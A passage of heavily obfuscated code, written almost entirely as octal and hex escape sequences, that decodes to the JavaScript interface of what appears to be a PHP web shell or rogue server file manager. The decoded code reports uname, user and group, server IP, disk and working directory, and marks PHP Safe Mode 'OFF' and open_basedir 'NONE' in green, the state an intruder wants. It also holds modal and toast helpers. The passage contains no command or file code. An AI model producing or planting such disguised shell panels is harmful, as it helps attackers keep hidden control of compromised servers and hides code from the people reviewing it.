7\135\x20\x7c\174\x20\163\x79\163\151\156\x66\157\x5b\47\165\156\141\155\x65\47\x5d\40\174\x7c\40\47\55\55\x27\73\12\40\x20\40\x20\x20\x20\40\40\40\40\40\40\165\160\144\x61\164\145\50\x27\x73\x79\x73\x2d\x75\x6e\141\155\145\x27\54\x20\165\x6e\x61\x6d\145\51\73\xa\40\40\40\40\40\x20\40\40\40\x20\40\x20\12\40\40\x20\40\x20\x20\x20\x20\x20\40\40\40\x2f\x2f\x20\125\x73\x65\x72\40\x61\156\144\40\107\162\x6f\165\x70\12\40\x20\40\40\x20\40\40\40\x20\40\x20\x20\143\x6f\x6e\163\164\x20\x75\x73\145\x72\40\75\40\143\x6f\156\x74\x65\170\164\x2e\165\163\x65\x72\40\174\x7c\40\x73\x79\163\x69\156\x66\x6f\133\x27\x55\x73\145\162\x27\x5d\x20\174\174\40\x27\x2d\55\47\x3b\12\40\40\x20\x20\40\x20\x20\x20\x20\x20\x20\x20\143\x6f\156\163\164\40\147\x72\x6f\165\160\40\75\40\163\171\163\x69\156\x66\x6f\133\x27\107\x72\157\165\x70\47\135\x20\174\x7c\40\47\x2d\x2d\x27\x3b\xa\40\40\40\40\40\40\40\x20\40\x20\x20\x20\165\160\144\x61\164\145\x28\47\x73\x79\163\55\165\x73\145\162\x27\54\x20\165\163\x65\x72\x29\73\xa\x20\x20\x20\x20\40\40\40\x20\40\x20\x20\40\165\x70\x64\x61\164\145\50\x27\163\171\163\55\x67\162\157\x75\160\47\54\x20\147\162\157\165\x70\x29\x3b\xa\40\x20\x20\x20\x20\x20\40\x20\x20\x20\40\40\12\40\x20\40\x20\x20\40\x20\x20\40\x20\40\40\x2f\57\40\x50\110\120\x20\x53\141\146\145\40\x4d\x6f\x64\145\xa\x20\40\x20\x20\40\x20\40\x20\40\x20\40\40\x63\x6f\x6e\163\x74\x20\x70\x68\160\123\x61\146\x65\40\75\x20\x73\171\163\x69\156\x66\x6f\133\47\123\x61\146\x65\40\x4d\x6f\144\x65\x27\135\40\x7c\x7c\40\x27\117\x46\x46\x27\x3b\xa\40\x20\x20\40\x20\40\x20\40\40\40\40\x20\x63\157\156\163\164\x20\x70\x68\160\x53\141\146\145\105\154\x20\x3d\40\144\x6f\x63\165\x6d\x65\156\x74\x2e\x67\x65\x74\105\x6c\x65\155\145\x6e\x74\102\171\111\x64\x28\x27\x73\x79\163\55\x70\150\160\55\x73\x61\x66\x65\47\51\x3b\xa\40\x20\40\40\x20\40\x20\x20\x20\x20\40\40\151\x66\x20\x28\160\x68\x70\x53\x61\146\x65\x45\154\51\40\173\12\40\x20\x20\40\40\x20\40\x20\x20\x20\40\40\x20\40\40\x20\160\x68\160\x53\141\x66\145\105\154\x2e\x74\x65\x78\x74\x43\157\156\x74\145\x6e\164\40\x3d\x20\140\x53\x61\146\x65\x20\x4d\x6f\x64\145\x3a\x20\x24\x7b\160\150\x70\x53\141\x66\x65\175\140\73\12\40\40\40\40\40\40\x20\x20\40\40\40\x20\40\40\x20\40\x70\x68\x70\x53\x61\x66\x65\105\x6c\56\163\164\171\154\x65\56\143\x6f\x6c\157\162\x20\75\x20\160\x68\x70\x53\x61\146\x65\x20\75\75\75\x20\x27\x4f\106\106\47\40\x3f\x20\x27\x76\x61\162\50\x2d\55\x61\x63\143\x65\156\x74\x2d\x67\x72\145\x65\156\x29\x27\x20\x3a\x20\x27\x76\141\162\50\x2d\x2d\141\x63\x63\145\x6e\164\x2d\162\145\144\51\47\73\12\x20\40\40\40\40\40\x20\40\x20\40\40\x20\175\xa\x20\40\x20\40\x20\x20\40\40\40\x20\40\40\12\40\40\x20\40\40\x20\40\40\40\40\x20\x20\x2f\57\40\123\145\x72\166\x65\162\x20\x49\x50\12\x20\x20\x20\40\40\40\40\40\40\x20\x20\40\x63\x6f\156\163\164\x20\x73\x65\162\x76\x65\x72\111\x50\x20\75\40\x73\171\x73\151\156\x66\157\133\47\123\x65\x72\166\x65\162\40\x49\x50\47\135\40\x7c\174\x20\x73\171\163\x69\156\x66\157\x5b\x27\123\145\162\x76\x65\x72\x49\x50\47\x5d\40\x7c\174\40\x63\x6f\x6e\x74\145\x78\164\x2e\x68\157\x73\x74\156\x61\155\145\40\x7c\x7c\x20\47\x2d\55\47\x3b\12\x20\40\40\40\x20\x20\40\40\40\x20\x20\40\165\160\144\141\164\x65\50\47\x73\171\x73\55\163\145\x72\166\145\x72\151\160\47\x2c\40\163\145\x72\x76\x65\x72\x49\x50\51\x3b\xa\x20\x20\40\x20\x20\40\40\40\x20\40\40\x20\xa\x20\x20\x20\x20\x20\x20\40\x20\40\40\x20\40\57\57\40\x44\141\164\x65\x54\151\155\145\xa\x20\x20\x20\x20\40\40\x20\40\x20\x20\x20\x20\143\157\x6e\x73\164\x20\156\x6f\167\40\75\x20\x6e\x65\167\40\104\141\164\145\x28\x29\73\xa\x20\x20\40\40\x20\40\40\x20\x20\x20\x20\40\143\x6f\156\163\x74\40\x64\x61\x74\x65\164\151\155\x65\x20\x3d\40\156\x6f\x77\x2e\164\157\114\x6f\x63\141\154\x65\123\x74\162\151\156\147\50\51\x3b\xa\40\x20\x20\x20\x20\40\x20\40\40\40\x20\x20\165\x70\144\x61\x74\x65\x28\47\x73\x79\x73\x2d\144\x61\164\145\x74\x69\x6d\x65\x27\54\40\x64\141\x74\145\164\151\155\x65\51\73\12\40\40\40\40\x20\x20\x20\x20\x20\x20\40\40\12\40\x20\40\x20\x20\x20\x20\x20\x20\40\40\x20\57\57\x20\x48\x44\104\12\40\x20\x20\x20\40\x20\40\40\40\x20\x20\x20\143\x6f\156\x73\164\x20\x68\x64\144\40\x3d\x20\x73\171\163\x69\156\146\x6f\133\x27\104\x69\x73\153\47\x5d\x20\174\174\x20\163\171\163\151\x6e\146\157\x5b\x27\x48\x44\x44\x27\x5d\40\x7c\174\40\x27\x2d\x2d\x27\73\12\x20\x20\40\x20\40\40\x20\x20\x20\40\40\x20\x75\x70\x64\141\x74\x65\50\x27\x73\171\x73\55\x68\144\x64\47\54\40\150\x64\x64\x29\x3b\xa\x20\x20\x20\40\x20\40\x20\x20\x20\40\x20\x20\12\40\40\x20\x20\40\x20\x20\x20\x20\40\40\40\57\57\40\x4f\160\145\156\137\142\141\x73\x65\x64\151\x72\12\x20\x20\40\x20\x20\40\40\x20\x20\40\x20\x20\143\157\156\163\x74\40\x62\141\163\x65\144\151\x72\40\75\40\163\171\163\x69\x6e\x66\x6f\x5b\x27\x4f\x70\x65\156\40\x42\x61\x73\145\x44\151\162\x27\x5d\x20\174\174\40\163\x79\x73\x69\x6e\146\157\133\47\x6f\160\x65\156\x5f\x62\x61\x73\145\x64\x69\162\x27\x5d\x20\x7c\x7c\40\47\x4e\x4f\116\x45\x27\73\12\x20\x20\40\x20\40\x20\x20\40\40\40\40\40\143\x6f\156\163\x74\x20\142\x61\163\x65\x64\x69\162\105\154\40\x3d\x20\x64\x6f\143\x75\155\x65\x6e\164\56\147\145\164\x45\x6c\x65\x6d\145\156\x74\x42\171\111\144\50\x27\163\171\163\x2d\142\x61\163\145\144\x69\x72\47\51\x3b\xa\x20\40\40\40\x20\x20\x20\x20\x20\x20\x20\x20\151\146\x20\50\x62\141\163\x65\144\151\x72\105\154\x29\40\173\xa\x20\x20\40\40\x20\x20\x20\x20\40\x20\x20\40\40\40\x20\40\x62\x61\163\145\144\x69\x72\x45\154\x2e\x74\145\x78\x74\x43\x6f\x6e\x74\145\156\x74\x20\x3d\x20\x62\x61\x73\145\144\151\162\x3b\12\x20\40\40\40\x20\40\40\x20\40\x20\40\40\40\40\40\x20\142\141\x73\145\144\x69\x72\105\x6c\x2e\x73\x74\x79\154\145\x2e\143\157\154\x6f\162\40\x3d\x20\x62\x61\x73\145\x64\151\162\40\75\75\x3d\40\47\x4e\x4f\116\105\47\40\174\x7c\40\x62\141\163\x65\x64\151\x72\x20\x3d\75\75\x20\x27\x27\x20\x3f\x20\47\x76\x61\162\50\55\x2d\x61\143\143\x65\x6e\164\55\147\162\x65\145\156\51\47\40\72\x20\47\x76\141\x72\x28\55\x2d\141\143\x63\145\x6e\x74\x2d\162\x65\144\x29\47\x3b\12\x20\x20\40\x20\x20\x20\x20\x20\40\x20\x20\x20\175\12\40\40\40\40\x20\x20\x20\40\40\x20\40\40\12\40\40\40\40\x20\40\x20\x20\x20\40\40\x20\x2f\x2f\40\120\x57\104\12\40\40\x20\x20\40\40\40\40\40\x20\40\40\x75\x70\144\x61\x74\145\x28\x27\163\171\x73\x2d\160\167\144\47\x2c\x20\143\x6f\156\164\145\x78\x74\x2e\143\167\144\40\x7c\x7c\40\x27\55\55\47\x29\73\xa\40\40\40\x20\x20\40\x20\x20\40\x20\40\40\xa\40\x20\40\x20\x20\x20\x20\40\x20\40\40\x20\57\x2f\x20\x55\x70\144\141\164\145\x20\x64\x61\164\x65\164\x69\155\x65\x20\145\166\145\162\171\40\x73\x65\x63\157\156\x64\12\40\40\40\x20\40\40\40\x20\40\40\x20\x20\163\x65\x74\x49\x6e\164\x65\162\x76\x61\154\50\x28\51\40\x3d\x3e\40\x7b\12\x20\x20\x20\40\40\x20\x20\40\x20\40\40\40\x20\x20\x20\x20\x63\157\x6e\x73\x74\40\x6e\x6f\x77\x20\75\x20\156\x65\167\x20\104\141\x74\x65\x28\x29\x3b\12\x20\40\x20\x20\40\x20\x20\40\x20\x20\x20\x20\x20\x20\x20\40\165\160\x64\141\164\145\x28\x27\163\171\x73\55\x64\141\x74\x65\x74\151\x6d\x65\47\54\x20\x6e\157\x77\56\164\157\x4c\x6f\143\141\x6c\145\123\164\162\151\156\x67\50\51\x29\x3b\xa\x20\x20\40\40\x20\x20\x20\x20\40\40\40\x20\x7d\x2c\40\x31\60\x30\60\x29\73\xa\x20\40\x20\x20\40\40\x20\x20\175\54\12\40\x20\40\40\x20\x20\40\40\146\157\x72\155\x61\x74\102\171\x74\145\x73\50\x62\x79\164\x65\x73\x2c\x20\144\145\x63\x69\155\x61\154\x73\x20\75\x20\62\x29\40\x7b\x20\151\146\x20\x28\142\171\x74\145\163\x20\75\75\x3d\x20\60\x29\40\162\x65\164\x75\162\x6e\40\x27\60\x20\102\x79\x74\x65\163\47\73\x20\143\x6f\x6e\x73\x74\x20\153\40\75\x20\x31\60\x32\x34\54\40\x64\x6d\40\x3d\40\x64\x65\143\151\x6d\x61\x6c\x73\x20\x3c\x20\x30\x20\77\x20\x30\x20\x3a\40\x64\x65\x63\151\155\141\x6c\x73\x2c\x20\x73\151\x7a\x65\x73\40\x3d\40\133\x27\x42\x79\164\145\163\47\x2c\x20\47\113\x42\47\x2c\x20\x27\115\102\x27\x2c\40\47\x47\102\47\x2c\x20\47\124\x42\x27\x5d\73\40\x63\x6f\x6e\163\164\x20\x69\40\x3d\40\115\x61\164\x68\x2e\146\154\157\x6f\x72\x28\115\x61\x74\x68\56\154\x6f\x67\x28\142\x79\x74\145\x73\51\x20\57\x20\115\141\164\x68\56\x6c\x6f\x67\x28\153\x29\51\73\x20\x72\x65\164\165\x72\156\x20\x70\x61\162\x73\145\106\154\157\x61\x74\50\50\x62\x79\x74\145\163\x20\x2f\40\115\141\x74\x68\x2e\x70\x6f\167\50\153\x2c\x20\151\51\51\56\164\x6f\x46\x69\x78\x65\144\x28\144\155\51\51\40\x2b\40\x27\x20\x27\40\53\x20\163\x69\172\145\x73\x5b\151\x5d\73\x20\175\x2c\xa\11\x9\x74\x6f\141\x73\164\x28\155\145\163\163\x61\147\145\x2c\x20\164\171\160\145\40\x3d\40\47\x73\165\x63\143\145\x73\x73\x27\x2c\x20\144\165\x72\141\164\x69\157\x6e\x20\x3d\x20\x34\60\60\x30\51\40\173\x20\143\157\x6e\163\164\x20\x65\x6c\40\x3d\40\x64\157\143\165\155\145\x6e\164\56\x67\145\164\105\x6c\x65\155\145\x6e\164\102\x79\x49\144\x28\47\x74\157\x61\163\x74\x27\51\73\40\x65\154\x2e\164\x65\x78\x74\103\x6f\156\x74\x65\x6e\x74\x20\75\40\155\145\163\163\x61\147\145\73\x20\145\x6c\56\143\154\x61\x73\x73\x4e\x61\x6d\145\40\75\40\x60\164\157\x61\x73\164\40\x73\x68\157\167\x20\x24\x7b\164\171\x70\145\175\x60\x3b\x20\163\145\x74\x54\x69\x6d\x65\x6f\165\x74\50\50\51\x20\75\x3e\x20\x65\154\56\x63\x6c\141\163\163\x4e\141\155\x65\40\x3d\x20\x65\x6c\x2e\x63\x6c\x61\x73\163\x4e\141\155\145\x2e\x72\145\x70\154\141\x63\145\x28\47\x73\150\x6f\167\x27\x2c\x20\x27\x27\x29\54\40\144\x75\162\141\x74\151\x6f\x6e\x29\x3b\40\x7d\54\xa\11\11\x73\x68\x6f\167\x4d\157\x64\141\x6c\50\x6d\x6f\x64\x61\154\x29\x20\173\x20\155\x6f\144\x61\x6c\x2e\x73\x74\171\x6c\x65\56\144\x69\x73\x70\154\x61\171\40\x3d\x20\x27\x66\x6c\x65\x78\x27\73\40\x7d\x2c\12\11\x9\143\154\157\x73\145\115\157\144\141\x6c\50\x6d\157\144\141\154\x29\x20\x7b\40\155\157\x64\141\x6c\56\163\164\x79\154\x65\56\144\x69\163\160\x6c\x61\171\x20\x3d\40\47\x6e\x6f\156\145\47\x3b\40\151\x66\x28\x6d\157\144\141\154\x2e\x69\x64\40\75\75\75\40\x27\145\x64\x69\164\157\x72\x2d\155\x6f\144\141\154\47\x20\46\x26\40\164\150\151\x73\x2e\145\x64\151\164\x6f\162\x29\40\x74\x68\x69\163\56\145\144\151\164\157\162\56\x73\145\x74\x56\141\x6c\165\145\x28\x27\x27\x29\x3b\40\x7d\x2c\12\x9\11\12\x9\x9\57\x2f\x20\103\165\163\164\x6f\155\x20\x63\x6f\x6e\x66\151\162\155\141\164\151\x6f\156\x20\x6d\157\x64\x61\154\x20\55\x20\x70\162\145\166\x65\x6e\164\163\x20\x64\x6f\165\x62\x6c\x65\x20\160\x6f\x70\x75\160\12\11\x9\x61\163\171\156\x63\x20\x73\x68\157\167\103\157\156\x66\x69\162\155\115\157\x64\141\x6c\50\x6d\145\163\163\x61\147\145\x2c\40\157\160\164\151\157\x6e\163\40\75\40\x7b\175\51\x20\173\12\11\x9\11\162\145\x74\165\162\x6e\40\156\145\167\40\x50\162\x6f\x6d\151\x73\x65\x28\50\162\145\163\157\x6c\166\145\x29\x20\75\x3e\40\173\12\11\x9\x9\11\143\157\156\x73\x74\40\155\157\x64\141\154\40\x3d\x20\x64\x6f\143\x75\x6d\145\x6e\x74\x2e\147\145\x74\x45\154\x65\x6d\145\156\164\x42\171\x49\144\50\x27\143\x6f\156\146\151\162\x6d\55\155\x6f\144\x61\x6c\47\x29\x3b\xa\x9\x9\x9\x9\x63\157\x6e\163\164\x20\x6d\145\163\163\141\147\x65\x45\154\x20\x3d\x20\144\157\x63\x75\155\145\156\x74\x2e\147\145\164\105\x6c\x65\x6d\145\156\164\x42\171\111\144\50\47\143\157\156\146\151\x72\155\55\155\145\163\163\141\147\145\47\51\x3b\xa\11\11\11\x9\x63\157\156\x73\164\40\164\x69\x74\154\145\105\x6c\40\75\40\144\x6f\x63\165\155\x65\x6e\164\x2e\147\145\x74\x45\x6c\145\155\145\156\164\x42\x79\x49\144\50\x27\143\157\156\x66\x69\162\x6d\x2d\x74\151\x74\154\x65\47\x29\73\12\x9\x9\11\11\143\x6f\x6e\163\x74\x20\x69\x63\x6f\x6e\x45\x6c\40\75\x20\144\x6f\143\165\155\x65\x6e\x74\x2e\x67\145\164\x45\154\145\155\145\x6e\x74\102\x79\x49\x64\x28\47\143\x6f\156\146\x69\162\155\55\151\143\x6f\x6e\47\x29\73\xa\x9\11\11\x9\x63\157\x6e\x73\164\x20\x6f\153\102\164\x6e\40\75\40\x64\157\x63\165\155\145\156\x74\56\x67\x65\x74\105\x6c\145\155\x65\156\x74\102\x79\111\x64\x28\x27\143\157\x6e\146\151\162\x6d\55\x6f\153\x2d\142\164\156\x27\x29\73\xa\11\x9\11\11\143\x6f\156\x73\164\40\x63\x61\x6e\143\x65\154\x42\164\156\x20\x3d\x20\144\157\x63\165\155\x65\156\x74\56\x67\x65\164\x45\154\145\155\x65\x6e\164\102\171\111\144\x28\47\143\x6f\x6e\x66\x69\162\x6d\x2d\143\x61\x6e\x63\x65\x6c\55\142\164\156\47\51\73\12\x9\11\x9\x9\143\157\x6e\163\164\40\x63\x6c\x6f\x73\x65\x42\164\x6e\40\75\x20\x64\157\x63\165\x6d\x65\x6e\x74\x2e\147\145\x74\105\x6c\x65\155\145\x6e\x74\102\x79\111\x64\50\x27\143\x6f\156\x66\x69\x72\155\x2d\x6d\157\x64\141\154\55\143\x6c\x6f\x73\x65\x27\x29\x3b\12\11\11\x9\11\12\x9\11\11\11\151\x66\x20\x28\x21\155\157\x64\x61\154\40\174\x7c\40\41\x6d\x65\x73\x73\141\x67\x65\x45\154\51\x20\x72\145\164\x75\x72\156\x20\162\145\163\157\x6c\166\x65\50\146\141\154\163\145\x29\x3b\xa\11\x9\11\x9\xa\11\x9\x9\x9\x2f\x2f\x20\x53\x65\x74\x20\155\x65\163\x73\141\x67\x65\12\x9\11\11\11\x6d\x65\x73\x73\141\147\x65\105\154\56\x69\156\x6e\x65\x72\110\124\x4d\114\x20\x3d\40\x6d\145\x73\163\141\147\145\x2e\x72\145\160\154\141\143\x65\50\x2f\x5c\156\57\x67\x2c\x20\x27\x3c\x62\162\x3e\47\51\x3b\xa\11\11\11\x9\xa\11\11\11\11\x2f\57\40\123\x65\x74\40\164\x69\164\x6c\145\40\141\156\144\40\151\x63\x6f\156\x20\x62\x61\163\145\144\x20\x6f\156\x20\x74\x79\x70\145\xa\x9\x9\11\x9\x63\x6f\x6e\163\x74\40\164\171\x70\145\40\x3d\x20\157\x70\x74\x69\157\x6e\x73\56\x74\171\x70\145\40\174\174\x20\x27\x77\141\x72\x6e\151\156\147\x27\73\xa\x9\x9\11\11\x63\157\x6e\x73\x74\40\151\x63\x6f\x6e\163\x20\x3d\40\x7b\xa\x9\x9\x9\x9\x9\167\141\x72\x6e\x69\x6e\147\72\40\47\342\232\xa0\357\xb8\x8f\47\54\xa\x9\x9\11\x9\11\x64\141\156\147\x65\x72\72\40\x27\xf0\237\227\x91\xef\xb8\217\x27\54\xa\11\x9\11\x9\x9\x69\x6e\x66\x6f\x3a\40\x27\342\204\271\xef\xb8\217\x27\54\12\x9\11\11\11\11\161\x75\145\163\164\x69\x6f\156\x3a\x20\x27\342\x9d\223\47\54\12\x9\11\11\11\x9\163\x75\143\x63\145\x73\x73\72\40\47\342\234\x85\x27\12\x9\x9\x9\11\175\x3b\12\11\x9\x9\11\143\x6f\x6e\x73\x74\40\164\151\x74\x6c\x65\163\x20\75\x20\x7b\12\x9\x9\x9\11\x9\167\141\x72\156\151\156\x67\x3a\40\x27\342\232\xa0\xef\270\217\40\x43\x6f\156\x66\x69\x72\x6d\141\164\x69\157\x6e\47\x2c\xa\x9\x9\x9\x9\x9\144\x61\x6e\x67\x65\x72\x3a\40\47\xf0\x9f\x97\221\357\xb8\x8f\40\x44\x65\x6c\x65\x74\145\x20\x43\157\x6e\146\151\x72\155\141\x74\x69\x6f\x6e\47\54\xa\x9\x9\x9\x9\11\151\156\146\157\x3a\40\x27\xe2\x84\271\xef\xb8\x8f\x20\x49\x6e\x66\157\162\155\141\x74\x69\157\x6e\47\x2c\xa\11\11\x9\x9\x9\x71\x75\x65\163\x74\151\157\x6e\72\40\x27\342\235\223\x20\103\157\156\x66\x69\162\x6d\x20\101\x63\x74\x69\x6f\x6e\47\x2c\12\x9\x9\x9\x9\11\163\165\143\143\145\163\163\72\x20\47\342\234\205\40\123\x75\x63\x63\145\x73\163\x27\12\x9\11\11\x9\175\73\xa\x9\x9\11\x9\xa\11\x9\x9\11\151\143\157\156\105\x6c\56\164\145\x78\x74\103\x6f\x6e\x74\145\156\164\x20\x3d\40\x69\143\x6f\156\x73\133\164\171\160\x65\135\40\x7c\174\x20\151\x63\157\x6e\163\56\x77\x61\162\x6e\x69\x6e\147\x3b\12\x9\x9\x9\11\164\x69\x74\x6c\x65\x45\154\x2e\164\145\x78\164\103\157\156\164\x65\156\164\x20\x3d\x20\x74\x69\164\x6c\x65\x73\133\x74\171\x70\145\135\40\x7c\x7c\x20\x74\151\x74\154\x65\163\x2e\x77\141\162\156\x69\x6e\147\x3b\12\11\x9\11\x9\12\x9\x9\x9\x9\x2f\x2f\x20\x53\x65\x74\x20\x62\x75\x74\164\x6f\156\x20\x74\145\170\164\12\x9\11\11\11\157\153\x42\164\156\56\x74\x65\x78\164\x43\157\x6e\x74\x65\x6e\164\40\75\x20\x6f\x70\164\x69\x6f\156\x73\56\157\153\124\145\170\164\x20\x7c\174\40\x27\117\x4b\x27\73\xa\11\x9\11\11\143\x61\156\143\145\154\102\x74\156\x2e\x74\145\170\164\x43\157\156\164\145\x6e\x74\x20\75\x20\157\x70\164\x69\157\x6e\x73\56\x63\x61\156\x63\x65\154\x54\x65\170\x74\x20\174\x7c\40\47\x43\x61\156\x63\x65\x6c\x27\73\12\x9\11\x9\x9\12\11\11\11\x9\57\x2f\x20\123\145\x74\x20\142\x75\164\164\157\156\x20\163\164\x79\x6c\x65\x20\x66\x6f\162\40\144\x61\x6e\x67\145\x72\40\141\x63\164\x69\x6f\x6e\x73\12\11\11\x9\11\x69\146\40\x28\164\x79\160\x65\x20\x3d\75\75\x20\47\144\x61\x6e\147\145\162\x27\51\x20\x7b\12\11\11\x9\x9\x9\x6f\153\x42\164\x6e\56\x63\154\x61\163\163\116\x61\155\145\40\x3d\40\x27\x63\x6f\x6e\146\151\x72\155\55\142\164\x6e\55\157\x6b\40\143\157\156\146\151\x72\x6d\55\142\x74\156\55\144\x61\x6e\x67\145\162\47\x3b\xa\x9\11\11\x9\x7d\40\145\154\163\x65\x20\173\12\x9\11\x9\11\x9\157\153\102\x74\156\x2e\143\x6c\x61\163\x73\116\141\x6d\145\40\75\x20\x27\143\157\156\146\x69\x72\155\55\142\164\x6e\55\157\x6b\x27\x3b\xa\11\11\11\11\175\xa\11\x9\11\11\xa\x9\x9\11\11\57\x2f\x20\122\145\x6d\157\166\145\x20\157\x6c\x64\x20\145\x76\145\156\x74\x20\x6c\151\163\164\145\156\x65\162\163\40\x62\x79\x20\x63\154\157\156\151\x6e\x67\x20\141\156\144\x20\x72\145\x70\x6c\x61\x63\151\156\147\xa\11\11\11\x9\143\157\x6e\x73\x74\x20\x6e\x65\167\117\x6b\x42\164\156\40\x3d\x20\x6f\153\x42\x74\156\x2e\143\154\x6f\156\x65\x4e\157\x64\x65\x28\x74\x72\165\x65\x29\73\12\x9\11\x9\x9\x63\157\156\x73\164\x20\156\145\167\x43\141\156\143\x65\x6c\x42\164\x6e\x20\75\x20\143\x61\x6e\x63\145\154\x42\x74\156\56\143\x6c\157\x6e\x65\116\157\x64\145\x28\x74\x72\165\145\51\73\12\x9\11\11\x9\143\x6f\156\x73\164\40\x6e\x65\167\x43\154\x6f\x73\145\102\164\156\x20\x3d\x20\x63\154\x6f\x73\145\x42\x74\x6e\x2e\x63\154\157\x6e\145\x4e\157\144\x65\50\x74\x72\165\x65\x29\73\12\11\x9\11\11\157\x6b\102\164\x6e\x2e\160\141\x72\145\x6e\x74\x4e\157\144\x65\x2e\162\x65\x70\154\x61\143\145\103\x68\151\x6c\144\x28\x6e\145\x77\117\x6b\102\x74\x6e\x2c\40\x6f\x6b\x42\x74\x6e\x29\x3b\12\x9\x9\11\11\143\141\156\x63\x65\154\x42\x74\156\56\x70\x61\162\x65\x6e\x74\116\157\x64\x65\56\x72\x65\x70\x6c\141\x63\145\x43\150\151\x6c\144\50\156\x65\x77\x43\x61\x6e\143\145\x6c\x42\x74\x6e\x2c\x20\x63\141\x6e\x63\x65\x6c\102\x74\x6e\x29\x3b\12\x9\x9\x9\x9\x63\154\x6f\163\x65\x42\164\x6e\x2e\x70\x61\x72\145\x6e\x74\x4e\157\144\x65\x2e\162\145\160\x6c\141\143\145\103\x68\x69\x6c\x64\x28\156\145\x77\x43\x6c\x6f\163\x65\102\x74\x6e\54\x20\x63\154\x6f\163\145\102\164\x6e\51\73\12\11\11\x9\x9\xa\x9\x9\11\11\x2f\57\40\123\164\157\x72\145\x20\x72\145\146\x65\x72\145\x6e\143\x65\163\x20\146\157\x72\x20\143\x6c\145\141\x6e\165\160\xa\x9\11\x9\11\x63\157\156\163\164\40\x68\x61\156\x64\154\x65\122\x65\x73\x6f\x6c\166\x65\40\75\40\50\x76\141\x6c\165\x65\51\x20\x3d\76\40\x7b\xa\11\11\11\11\x9\x74\150\x69\x73\x2e\x63\x6c\x6f\163\x65\x4d\x6f\x64\x61\x6c\50\155\157\144\x61\x6c\x29\x3b\12\x9\11\x9\11\11\144\157\x63\x75\155\x65\156\x74\x2e\162\145\x6d\157\166\145\x45\166\x65\156\x74\114\x69\163\164\145\156\x65\162\x28\x27\153\145\171\144\x6f\167\156\x27\x2c\40\145\163\143\110\141\x6e\144\154\x65\162\51\73\xa\11\x9\11\11\x9\x72\x65\x73\x6f\154\x76\x65\50\166\x61\154\165\145\x29\73\12\11\11\x9\x9\175\73\12\x9\x9\11\x9\xa\11\11\x9\x9\57\x2f\40\110\141\156\x64\x6c\x65\x20\105\123\x43\x20\x6b\x65\171\xa\x9\x9\x9\x9\x63\x6f\156\x73\x74\40\x65\163\x63\110\x61\156\x64\x6c\x65\x72\x20\75\x20\50\145\x29\x20\x3d\76\40\173\12\11\11\11\11\x9\x69\x66\x20\x28\x65\x2e\153\145\171\40\x3d\75\x3d\x20\47\x45\x73\143\141\x70\145\x27\x29\40\x7b\xa\11\11\x9\11\11\x9\150\x61\x6e\144\x6c\145\x52\x65\163\x6f\x6c\x76\145\50\146\141\x6c\x73\x65\x29\x3b\12\x9\11\x9\11\x9\x7d\12\x9\11\x9\x9\x7d\x3b\xa\x9\11\11\x9\12\11\11\x9\11\x2f\57\x20\101\144\144\40\x6e\145\x77\40\145\x76\145\156\x74\x20\154\x69\163\164\x65\156\145\162\x73\40\50\x6f\x6e\x6c\171\40\x6f\x6e\143\x65\x29\xa\11\11\11\x9\x6e\145\x77\x4f\x6b\x42\164\x6e\x2e\157\156\x63\154\x69\143\153\x20\x3d\40\x28\x29\x20\75\x3e\x20\150\141\156\144\154\145\x52\145\x73\157\154\166\145\50\x74\162\x75\x65\x29\73\12\11\11\11\x9\156\145\x77\x43\141\156\x63\145\154\102\x74\x6e\56\x6f\x6e\x63\x6c\x69\143\153\x20\x3d\x20\x28\51\x20\x3d\76\x20\150\x61\156\x64\x6c\145\x52\x65\x73\x6f\x6c\x76\x65\50\146\141\x6c\x73\x65\x29\73\12\11\x9\11\11\x6e\145\167\x43\x6c\157\x73\x65\x42\164\x6e\56\157\156\143\x6c\x69\x63\x6b\40\75\x20\50\x29\x20\x3d\x3e\40\x68\141\x6e\144\154\x65\122\x65\x73\x6f\x6c\166\x65\x28\146\141\x6c\x73\x65\51\x3b\xa\x9\11\x9\11\xa\x9\11\11\11\x2f\x2f\x20\103\x6c\157\x73\145\x20\157\156\40\142\x61\143\153\144\x72\157\x70\40\143\x6c\151\x63\153\40\x28\x72\x65\x70\x6c\x61\x63\145\40\x6f\154\x64\40\x68\141\156\x64\154\145\x72\51\12\11\11\x9\x9\x63\157\x6e\x73\164\40\142\141\143\x6b\x64\x72\x6f\x70\110\x61\x6e\x64\x6c\145\162\40\x3d\40\x28\x65\51\x20\x3d\x3e\40\173\12\11\11\x9\x9\11\151\146\x20\x28\145\x2e\164\x61\x72\147\x65\164\40\75\x3d\x3d\x20\x6d\x6f\x64\x61\154\x29\x20\173\12\11\11\11\11\11\x9\x68\x61\156\144\x6c\145\122\x65\163\x6f\154\x76\145\x28\x66\141\x6c\163\145\x29\x3b\xa\x9\x9\11\x9\11\x7d\12\x9\x9\11\x9\x7d\73\12\11\x9\11\11\x6d\157\x64\141\x6c\x2e\x6f\156\143\154\151\143\153\x20\x3d\x20\x62\x61\x63\153\144\162\157\x70\x48\x61\x6e\x64\x6c\145\162\73\12\11\x9\x9\11\xa\x9\x9\x9\x9\57\57\40\x41\144\144\40\x45\x53\x43\x20\x6b\x65\x79\x20\154\x69\x73\164\145\x6e\x65\x72\xa\11\11\11\x9\x64\x6f\x63\x75\155\x65\156\164\x2e\x61\x64\x64\x45\x76\x65\156\x74\x4c\x69\163\x74\x65\156\x65\162\x28\47\x6b\x65\x79\144\x6f\x77\x6e\x27\54\40\x65\x73\x63\x48\x61\x6e\x64\154\x65\162\x29\73\xa\11\x9\11\11\12\11\x9\11\x9\x2f\x2f\x20\x53\150\157\167\40\x6d\157\144\141\x6c\xa\11\11\x9\11\164\x68\151\163\x2e\163\150\157\x77\115\157\144\x61\x6c\50\155\157\x64\141\x6c\51\73\xa\11\x9\11\x9\12\x9\x9\11\11\x2f\x2f\40\106\157\143\165\163\40\157\156\x20\117\113\40\142\x75\164\164\157\156\12\x9\11\x9\x9\163\145\x74\124\x69\155\x65\157\x75\x74\x28\x28\x29\x20\75\x3e\40\156\145\167\117\153\102\164\x6e\x2e\x66\157\x63\165\163\x28\x29\x2c\40\61\60\60\x29\x3b\xa\11\11\x9\x7d\51\73\xa\11\11\175\54\12\11\x9\57\x2f\x20\x43\165\x73\x74\157\155\x20\151\156\160\165\164\x20\155\157\144\141\154\40\55\x20\x72\x65\x70\154\x61\143\x65\163\40\160\162\x6f\155\160\164\50\x29\12\11\x9\141\163\171\156\143\40\163\150\x6f\x77\x49\156\x70\165\x74\115\157\144\141\x6c\x28\x6d\145\x73\x73\x61\x67\145\x2c\40\144\x65\x66\141\x75\x6c\x74\126\x61\x6c\165\145\40\x3d\40\47\x27\x2c\x20\x6f\x70\x74\x69\157\156\x73\x20\75\x20\17